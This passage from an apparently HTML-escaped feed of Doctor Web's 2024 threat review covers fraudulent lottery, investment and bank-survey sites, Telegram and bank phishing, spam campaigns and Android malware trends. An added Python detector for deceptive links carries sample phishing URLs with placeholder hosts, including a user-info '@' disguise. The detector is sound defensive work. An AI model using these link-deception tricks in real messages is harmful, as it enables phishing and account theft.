        &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_common/07_fraud_2024.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_common/07_fraud_2024.png" alt="netfraud_2024"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;A fraudulent site offers visitors the option to use the Faster Payment System as one way to pay for their “order”&lt;/em&gt;&lt;/p&gt;

    &lt;p&gt;
        The scheme involving “free” lottery tickets also remained popular. Lottery draws, allegedly performed online, always end in “winnings” for potential victims. 
        To get their prize, users also have to pay a “commission”.
    &lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_common/08_fraud_2024.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_common/08_fraud_2024.png" alt="netfraud_2024"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;This user has supposedly won 314,904 rubles in the lottery, and to “get” their prize, they need to pay a “commission”&lt;/em&gt;&lt;/p&gt;

    &lt;p&gt;
        Scammers also kept fake finance-themed websites in their arsenal. Popular topics included receiving payments from the government or private companies, 
        investing in the oil and gas sector, financial literacy training, and trading stocks with the help of “unique” automated systems or “verified” strategies that 
        supposedly guarantee income, among others. Threat actors also exploited the names of media personalities to attract users’ attention. 
        Examples of such sites are shown below.
    &lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_common/09_fraud_2024.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_common/09_fraud_2024.png" alt="netfraud_2024"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;A fraudulent site offers visitors the chance to “make up to 10,000 euros per month on the unique WhatsApp platform”&lt;/em&gt;&lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_common/10_fraud_2024.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_common/10_fraud_2024.png" alt="netfraud_2024"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;Russian singer Shaman “shared a secret platform for success” that allegedly can generate an income of $14,000 per month&lt;/em&gt;&lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_common/11_fraud_2024.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_common/11_fraud_2024.png" alt="netfraud_2024"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;The fake site of an oil and gas company offers access to an investment service and promises income starting at 150,000 rubles&lt;/em&gt;&lt;/p&gt;

    &lt;div class="flex fxCenter"&gt;
        &lt;div class="margRM"&gt;
          &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_common/14_fraud_2024.png" class="preview"&gt;
            &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_common/14_fraud_2024.1.png" alt="netfraud_2024"&gt;
          &lt;/a&gt;
        &lt;/div&gt;
        &lt;div&gt;
          &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_common/13_fraud_2024.png" class="preview"&gt;
            &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_common/13_fraud_2024.1.png" alt="netfraud_2024"&gt;
          &lt;/a&gt;
        &lt;/div&gt;
    &lt;/div&gt;
    &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;Fraudulent sites that imitate real bank investing services&lt;/em&gt;&lt;/p&gt;

    &lt;p&gt;
        Meanwhile, our specialists detected new schemes. For example, scammers, allegedly on behalf of large companies, 
        offered users a reward for participating in service-quality surveys. Such fakes included fictitious websites of 
        credit organizations. On these, users were asked to provide sensitive personal information that could include their 
        full name, the mobile phone number linked with their bank account, and their bank card number.
    &lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_common/15_fraud_2024.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_common/15_fraud_2024.png" alt="netfraud_2024"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;A fake bank website offers a reward of 6,000 rubles for participating in a survey on “improving service quality”&lt;/em&gt;&lt;/p&gt;

    &lt;p&gt;
        At the same time, such fakes also targeted users in other countries. For instance, the site shown below assured European users that they would receive dividends 
        for investing in promising sectors of the economy:
    &lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_common/16_fraud_2024.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_common/16_fraud_2024.png" alt="netfraud_2024"&gt;
        &lt;/a&gt;
    &lt;/div&gt;

    &lt;p&gt;
        And this site advertised a “new investing platform from Google” that could allegedly help users make money, starting at €1000:
    &lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_common/17_fraud_2024.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_common/17_fraud_2024.png" alt="netfraud_2024"&gt;
        &lt;/a&gt;
    &lt;/div&gt;

    &lt;p&gt;
        Another fraudulent Internet resource offered Slovak users the opportunity to “make more than $192,460 per month” with the help of some investing service:
    &lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_common/18_fraud_2024.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_common/18_fraud_2024.png" alt="netfraud_2024"&gt;
        &lt;/a&gt;
    &lt;/div&gt;

    &lt;p&gt;
        Users from Azerbaijan could allegedly also significantly improve their financial situation, earning 1000 manat or more per month. 
        All they had to do was take a short survey and get access to a service supposedly related to an Azerbaijani oil and gas company:
    &lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_common/19_fraud_2024.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_common/19_fraud_2024.png" alt="netfraud_2024"&gt;
        &lt;/a&gt;
    &lt;/div&gt;

    &lt;p&gt;
        At the end of the year, fraudsters held to tradition and began adapting these fake websites to the New Year holiday theme. 
        The fake website of a crypto exchange shown below, for example, promised Russian users New Year payments:
    &lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_common/20_fraud_2024.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_common/20_fraud_2024.png" alt="netfraud_2024"&gt;
        &lt;/a&gt;
    &lt;/div&gt;

    &lt;p&gt;
        Another site offered users holiday payments supposedly on behalf of an investing company:
    &lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_common/21_fraud_2024.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_common/21_fraud_2024.png" alt="netfraud_2024"&gt;
        &lt;/a&gt;
    &lt;/div&gt;

    &lt;p&gt;
        And this fraudulent Internet resource promised users from Kazakhstan large payments in honor of Independence Day as part of a “New Year offer”: 
    &lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_common/22_fraud_2024.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_common/22_fraud_2024.png" alt="netfraud_2024"&gt;
        &lt;/a&gt;
    &lt;/div&gt;

    &lt;p&gt;
        Throughout the year, our Internet analysts detected other phishing sites as well. Among them were fake websites of online education services. 
        One, for instance, simulated the appearance of a genuine site and offered programming courses. To “receive a consultation”, users were asked to provide their personal data.
    &lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_common/23_fraud_2024.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_common/23_fraud_2024.png" alt="netfraud_2024"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;A fake website that was disguised as a real online resource of an online education service&lt;/em&gt;&lt;/p&gt;

    &lt;p&gt;
        Additionally, attempts to steal Telegram user accounts continued. For this, fraudsters used phishing websites camouflaged as various online voting platforms. 
        Among these, sites asking visitors to “vote in children’s drawing competitions” were widespread again. Potential victims are asked to provide their mobile phone 
        number to receive a one-time code. However, when they enter this code on such a website, users are giving scammers access to their accounts.
    &lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_common/24_fraud_2024.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_common/24_fraud_2024.png" alt="netfraud_2024"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;A phishing website for “voting” in an online children’s drawing competition&lt;/em&gt;&lt;/p&gt;

    &lt;p&gt;
        On other similar sites, potential victims were offered a “free” subscription to a Telegram Premium service. 
        Users are asked to log into their account, but the confidential data that they enter there is sent to the 
        cybercriminals who then hijack their accounts. It is noteworthy that the links to these sites are distributed 
        in a variety of ways, including through the messenger itself. And the real address of the target site in such 
        messages often does not match the one that users see.
    &lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_common/25_fraud_2024.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_common/25_fraud_2024.png" alt="netfraud_2024"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;A phishing message in Telegram, in which, in order to “activate” a Telegram Premium subscription, users are asked to follow the given link. The text of this link does not in fact match the target URL&lt;/em&gt;&lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_common/26_fraud_2024.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_common/26_fraud_2024.png" alt="netfraud_2024"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;The phishing site loaded after the link in the fraudulent message is followed&lt;/em&gt;&lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_common/27_fraud_2024.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_common/27_fraud_2024.png" alt="netfraud_2024"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;After the user clicks the button on the previous page, the website displays an authorization form that looks like the genuine one&lt;/em&gt;&lt;/p&gt;

    &lt;p&gt;
        To distribute links to fraudulent sites, cybercriminals use email spam, among other avenues. Over the course of last year, our Internet analysts detected many different spam campaigns. 
        They observed the active distribution of phishing emails targeting Japanese users. For example, scammers, allegedly on behalf of some bank, informed potential victims about some purchase 
        and suggested that they view the details of the “payment” by following the provided link. In reality, this link led to a phishing Internet resource.
    &lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_common/28_fraud_2024.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_common/28_fraud_2024.png" alt="netfraud_2024"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;A phishing email, supposedly sent on behalf of a bank and offering Japanese users the option to view the details of a payment&lt;/em&gt;&lt;/p&gt;

    &lt;p&gt;
        In another popular scenario, threat actors, supposedly on behalf of credit organizations, were sending fake notifications containing information about a month’s 
        worth of bank card expenses. At the same time, the links to phishing sites were often concealed and seemed harmless in the email texts.
    &lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_common/29_fraud_2024.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_common/29_fraud_2024.png" alt="netfraud_2024"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;In the texts of spam emails, users saw the links to real bank web addresses, but when clicked, these addresses led to a fraudulent Internet resource&lt;/em&gt;&lt;/p&gt;
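    &lt;p&gt;
        Both the Telegram Premium messages described earlier and the bank-themed spam above rely on the same trick: the link text shows one address while the link actually points elsewhere. 
        The following is an added example, not code from Doctor Web's review. It takes (visible text, href) pairs as a mail or message parser would extract them and reports links whose shown host and real host belong to different sites; it also handles the case where a legitimate-looking host is placed in the user-info part of the URL. 
        All hostnames in the sample are constructed placeholders, the function names are hypothetical, and the last-two-labels site comparison is a simplification (a public suffix list should be used in production).
    &lt;/p&gt;

```python
"""Added example (not part of Doctor Web's review): decide whether a link's visible
text misrepresents where it leads. Input is a list of (visible_text, href) pairs,
the form in which an email or message parser would hand the links over."""

from urllib.parse import urlsplit


def _site(host):
    """Crude registrable-domain approximation: the last two labels. Wrong for
    multi-part public suffixes such as co.uk; use a PSL library in production."""
    labels = host.lower().strip(".").split(".")
    return ".".join(labels[-2:])


def host_of(url):
    """Hostname of a URL, adding a scheme when the text lacks one.
    Returns None if the value cannot be parsed as a URL with a host."""
    if "://" not in url:
        url = "https://" + url
    try:
        host = urlsplit(url).hostname   # drops user-info such as bank.test@ before the real host
    except ValueError:
        return None
    if not host:
        return None
    # Decode punycode so a homograph domain is compared by what the user would see
    try:
        return host.encode("ascii").decode("idna")
    except (UnicodeError, ValueError):
        return host


def looks_like_url(text):
    """Does the visible text itself present an address to the reader?"""
    text = text.strip()
    if "://" in text:
        return True
    head = text.split("/")[0]
    return "." in head and " " not in head and not head.endswith(".")


def classify_link(text, href):
    """Return (verdict, shown_host, actual_host); verdict is one of
    'mismatch', 'consistent', 'unparsable' or 'no_url_in_text'."""
    if not looks_like_url(text):
        return ("no_url_in_text", None, host_of(href))
    shown, actual = host_of(text), host_of(href)
    if shown is None or actual is None:
        return ("unparsable", shown, actual)
    if _site(shown) == _site(actual):
        return ("consistent", shown, actual)
    return ("mismatch", shown, actual)


def find_mismatched_links(links):
    """Filter a list of (text, href) pairs down to the ones that lie about their target."""
    return [(t, h) for t, h in links if classify_link(t, h)[0] == "mismatch"]


# Constructed sample modelled on the spam described in the review; every host is a placeholder
SAMPLE_LINKS = [
    # same site, different subdomain: consistent
    ("https://www.example-bank.test/statement", "https://login.example-bank.test/statement"),
    # the bank's name is only a prefix of the attacker's host: mismatch
    ("www.example-bank.test", "https://example-bank.test.attacker.invalid/login"),
    # the bank's name sits in the user-info part; the real host is after the @: mismatch
    ("example-bank.test", "https://example-bank.test@attacker.invalid/login"),
    # plain wording, no address shown: nothing to compare, judge by other means
    ("View payment details", "https://attacker.invalid/pay"),
]

if __name__ == "__main__":
    for text, href in SAMPLE_LINKS:
        print(classify_link(text, href), text, "->", href)
```

    &lt;p&gt;
        Links whose text is ordinary wording ("View payment details") are deliberately left out of the mismatch verdict: there is nothing to compare, and such links have to be judged by where they lead rather than by what they say.
    &lt;/p&gt;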

    &lt;p&gt;
        One spam campaign targeted European users. For example, users in Belgium encountered phishing emails that claimed their bank accounts had been “blocked”. 
        To get them “unblocked”, they were asked to follow a link which, in fact, led to the fraudsters’ website.
    &lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_common/30_fraud_2024.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_common/30_fraud_2024.png" alt="netfraud_2024"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;An unwanted letter threatens a potential victim with a “blocked” bank account&lt;/em&gt;&lt;/p&gt;

    &lt;p&gt;
        We also detected other spam campaigns, for example, those aimed at an English-speaking audience. In one such campaign, 
        potential victims received messages asking them to confirm receipt of a large money transfer. However, the link in these 
        messages led to a phishing online bank authorization form, which resembled the one on the genuine bank’s website.
    &lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_common/31_fraud_2024.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_common/31_fraud_2024.png" alt="netfraud_2024"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;A spam email saying that the user supposedly needs to confirm receipt of US$1,218.16&lt;/em&gt;&lt;/p&gt;

    &lt;p&gt;
        Russian users most often encountered spam letters that helped fraudsters lure potential victims to the phishing websites 
        we covered earlier in this review. Common topics for these unwanted messages were prizes and discounts from online stores, 
        free lottery tickets, and access to investment services. Examples of them are shown in the screenshots below.
    &lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_common/32_fraud_2024.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_common/32_fraud_2024.png" alt="netfraud_2024"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;A letter, allegedly from an online store, offering the chance to participate in a “prize draw”&lt;/em&gt;&lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_common/33_fraud_2024.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_common/33_fraud_2024.png" alt="netfraud_2024"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;A letter, allegedly from a credit organization, offering the chance to “become a successful investor”&lt;/em&gt;&lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_common/34_fraud_2024.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_common/34_fraud_2024.png" alt="netfraud_2024"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;A letter, allegedly sent on behalf of an electronics store, offering a promo code that the recipient can activate to get a discount on goods&lt;/em&gt;&lt;/p&gt;
&lt;/section&gt;

&lt;section class="margTM margBM" id="formobile"&gt;
    &lt;h2 class="alignCenter"&gt;Mobile devices&lt;/h2&gt;
    &lt;p&gt;
        According to detection statistics collected by Dr.Web Security Space for mobile devices, in 2024, 
        &lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; trojans were once again the most common Android malicious programs. They accounted for more than a third of malware detections. 
        Such trojans conceal their presence on infected devices and display ads. Among the most active members of this family were &lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.3956&lt;/b&gt;, 
        &lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.3851&lt;/b&gt;, &lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.655.origin&lt;/b&gt;, 
        and &lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.3994&lt;/b&gt;. At the same time, users encountered &lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds.Aegis&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds.Aegis&lt;/b&gt;&lt;/a&gt; trojan variants capable of running automatically after installation. 
        Other widespread malicious programs were &lt;a href="https://vms.drweb.com/search/?q=Android.FakeApp&amp;lng=en"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt; trojans, used in a variety of fraudulent schemes, and &lt;a href="https://vms.drweb.com/search/?q=Android.Spy&amp;lng=en"&gt;&lt;b&gt;Android.Spy&lt;/b&gt;&lt;/a&gt; spyware trojans.
    &lt;/p&gt;
    &lt;p&gt;
        The most active unwanted programs were members of the &lt;a href="https://vms.drweb.com/search/?q=Program.FakeMoney&amp;lng=en"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;, 
        &lt;a href="https://vms.drweb.com/search/?q=Program.CloudInject&amp;lng=en"&gt;&lt;b&gt;Program.CloudInject&lt;/b&gt;&lt;/a&gt;, and &lt;a href="https://vms.drweb.com/search/?q=Program.FakeAntiVirus&amp;lng=en"&gt;&lt;b&gt;Program.FakeAntiVirus&lt;/b&gt;&lt;/a&gt; families. 
        The first ones offer users the opportunity to get virtual rewards by completing various tasks and then withdraw those rewards as real money. 
        However, users never receive any payments. The second ones are programs modified through a specialized cloud service. During modification, uncontrolled 
        code and a number of dangerous permissions are added to them. The third ones are programs that imitate anti-virus software, detect nonexistent threats, 
        and offer users the option to buy the full version to fix the “problems” that had allegedly been found.
    &lt;/p&gt;
    &lt;p&gt;
        &lt;a href="https://vms.drweb.com/search/?q=Tool.SilentInstaller&amp;lng=en"&gt;&lt;b&gt;Tool.SilentInstaller&lt;/b&gt;&lt;/a&gt; utilities, which allow Android apps to run without being installed, were once again the most commonly detected potentially dangerous software. 
        They accounted for more than a third of the detections of this type of threat. Also widespread were apps modified with the NP Manager tool (these are detected as 
        &lt;b&gt;Tool.NPMod&lt;/b&gt;). A special module embedded into such modified programs allows them to bypass digital signature verification after they have been modified. 
        Apps protected with the 
        &lt;a href="https://vms.drweb.com/search/?q=Tool.Packer&amp;lng=en"&gt;&lt;b&gt;Tool.Packer&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt; software packer were also detected quite often, as was the &lt;a href="https://vms.drweb.com/search/?q=Tool.Androlua&amp;lng=en"&gt;&lt;b&gt;Tool.Androlua&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt; framework. 
        The latter allows installed Android programs to be modified and potentially dangerous Lua scripts to be executed.
    &lt;/p&gt;
    &lt;p&gt;
        The most widespread adware software was the new family &lt;a href="https://vms.drweb.com/search/?q=Adware.ModAd&amp;lng=en"&gt;&lt;b&gt;Adware.ModAd&lt;/b&gt;&lt;/a&gt;, which accounted for almost half of all detections. 
        These are specially modified versions of the WhatsApp messenger whose functions have been injected with code for loading advertising links. 
        Members of the &lt;a href="https://vms.drweb.com/search/?q=Adware.Adpush&amp;lng=en"&gt;&lt;b&gt;Adware.Adpush&lt;/b&gt;&lt;/a&gt; family ranked second, while another new family, 
        &lt;b&gt;Adware.Basement&lt;/b&gt;, occupied third place.
    &lt;/p&gt;
    &lt;p&gt;
        In 2024, Android banking trojans were slightly more active than in 2023. At the same time, our specialists observed an increase in the popularity 
        of some techniques used to protect malware from analysis and detection. This was commonly seen in banking trojans. Such techniques included undertaking various 
        manipulations with the ZIP file format (as Android APK files are based on this format) and the configuration file &lt;span class="string"&gt;AndroidManifest.xml&lt;/span&gt; of Android apps.
    &lt;/p&gt;
    &lt;p&gt;
        The widespread distribution of the &lt;b&gt;Android.SpyMax&lt;/b&gt; malicious program is worth a separate mention. Cybercriminals actively used this spyware trojan as a banking trojan, 
        particularly against Russian users (46.23% of detections), and also against Brazilian (35.46% of detections) and Turkish (5.80% of detections) Android device owners.
    &lt;/p&gt;
    &lt;p&gt;
        Throughout the year, Doctor Web’s virus analysts detected over 200 different threats on Google Play. Among them were trojans that subscribe users to paid services, 
        spyware trojans, and fraudulent and adware apps. Combined, they have been downloaded at least 26.7 million times. Moreover, our specialists detected another attack on 
        Android TV box sets: the &lt;a href="https://vms.drweb.com/search/?q=Android.Vo1d&amp;lng=en"&gt;&lt;b&gt;Android.Vo1d&lt;/b&gt;&lt;/a&gt; backdoor has infected almost 1.3 million user devices in 197 countries. This trojan placed its components into the system 
        storage area and, when commanded, could covertly download third-party apps from the Internet and install them.
    &lt;/p&gt;
    &lt;p&gt;
        To find out more about the security-threat landscape for mobile devices in 2024, read our &lt;a href="https://news.drweb.com/show/review/?i=14970&amp;lng=en" target="_blank" rel="noopener noreferrer"&gt;special overview&lt;/a&gt;.
    &lt;/p&gt;
&lt;/section&gt;

&lt;section class="margTM margBM" id="future"&gt;
    &lt;h2 class="alignCenter"&gt;Prospects and possible trends&lt;/h2&gt;
    &lt;p&gt;
        The events of the past year have once again demonstrated the diversity of the modern cyber-threat landscape. Malicious actors are interested in both large targets, 
        such as the private corporate and government sectors, and ordinary users. The functionality of many of the malicious programs used in the targeted attacks we investigated 
        indicates that virus writers are constantly searching for new opportunities to improve their methods of conducting malicious campaigns and developing their tools. 
        Over time, new techniques inevitably transfer to more widespread threats. In this regard, in 2025, we may witness the emergence of more trojans that use eBPF technology 
        to conceal their malicious activity. Moreover, we should also expect new targeted attacks, including those that utilize exploits.
    &lt;/p&gt;
    &lt;p&gt;
        One of the main goals of cybercriminals is to make money illegally, so 2025 may see an increase in the activity of banking and ad-displaying trojans. 
        In addition, users may be threatened by more malware with spyware functionality.
    &lt;/p&gt;
    &lt;p&gt;
        At the same time, not only Windows computer users will be the target, but also users of other operating systems, such as Linux and macOS. 
        The distribution of mobile threats will continue. Android device owners should above all be wary of the emergence of new spyware and banking 
        trojans as well as malicious and unwanted ad-displaying apps. New attempts to infect Android TVs, Android TV box sets, and other Android-based 
        devices are also to be expected. Moreover, chances are high that new threats will emerge on Google Play.
    &lt;/p&gt;


&lt;/section&gt;

</description></item><item><guid>https://news.drweb.com/show/?i=14970&amp;lng=en</guid><title>Doctor Web’s review of virus activity on mobile devices in 2024</title><link>https://news.drweb.com/show/?i=14970&amp;lng=en&amp;c=9</link><pubDate>Thu, 30 Jan 2025 00:00:00 GMT</pubDate><description>


&lt;p&gt;&lt;b&gt;January 30, 2025&lt;/b&gt;&lt;/p&gt;

&lt;section class="margTM margBM" id="main"&gt;
    &lt;p&gt;&lt;newslead&gt;In 2024, ad-displaying trojans were once again the most widespread Android threats. Fraudulent software, ransom trojans, clickers, and banking trojans were more active than in the previous year. Among the latter, compared to 2023, the most common were simple banking trojans that steal only online bank account access data and SMS confirmation codes.&lt;/newslead&gt;&lt;/p&gt;
    &lt;p&gt;
        Among the most active unwanted software programs were apps offering users the opportunity to complete various tasks in exchange 
        for virtual rewards, which can supposedly be converted into real money. The most commonly detected riskware apps were tools that 
        allow Android programs to launch without being installed. And the most active adware programs were specially modified WhatsApp 
        messenger versions whose functions had been injected with code for loading adware URLs.
    &lt;/p&gt;
    &lt;p&gt;
        Over the course of last year, Doctor Web's malware analysts discovered hundreds of new threats on Google Play, with over 26.7 million 
        cumulative downloads. Among these were malicious programs, including a spyware trojan, and unwanted and adware apps.
    &lt;/p&gt;
    &lt;p&gt;
        Our experts also uncovered a new attack on Android-based TV box sets. Around 1.3 million devices were affected by a backdoor 
        that infected the system storage and, when commanded by attackers, could download and install third-party software.
    &lt;/p&gt;
    &lt;p&gt;
        In addition, Doctor Web’s virus analysts noted the growing popularity of a number of techniques aimed at making Android 
        malware more complicated to analyze and more difficult for antiviruses to detect. These techniques included various 
        manipulations with the ZIP archive format (the APK files of Android apps are based on the ZIP format), manipulations with 
        the apps’ configuration file 
        &lt;span class="string"&gt;AndroidManifest.xml&lt;/span&gt;,
        and others. These methods were most often found to be used in banking trojans.
    &lt;/p&gt;

    &lt;div class="paddXM paddYM bg_ocean_1 white custom-color-link"&gt;
        &lt;h4 class="white alignCenter"&gt;PRINCIPAL TRENDS IN 2024&lt;/h4&gt;
        &lt;ul&gt;
            &lt;li&gt;Ad-displaying malware remained the most widespread threat;&lt;/li&gt;
            &lt;li&gt;An increase in banking trojan activity;&lt;/li&gt;
            &lt;li&gt;
                Cybercriminals increasingly used simple &lt;a href="https://vms.drweb.com/search/?q=Android.Banker&amp;lng=en"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt; 
                banking trojans, which steal only login data for online bank accounts and also verification codes from SMS;
            &lt;/li&gt;
            &lt;li&gt;
                Threat actors increasingly resorted to manipulating the format of APK apps and their structural components 
                to avoid being detected by anti-viruses and to make it more difficult for their malware to be analyzed;
            &lt;/li&gt;
            &lt;li&gt;An increase in the number of &lt;a href="https://vms.drweb.com/search/?q=Android.Locker&amp;lng=en"&gt;&lt;b&gt;Android.Locker&lt;/b&gt;&lt;/a&gt; ransomware trojans and &lt;a href="https://vms.drweb.com/search/?q=Android.Click&amp;lng=en"&gt;&lt;b&gt;Android.Click&lt;/b&gt;&lt;/a&gt; trojan clickers;&lt;/li&gt;
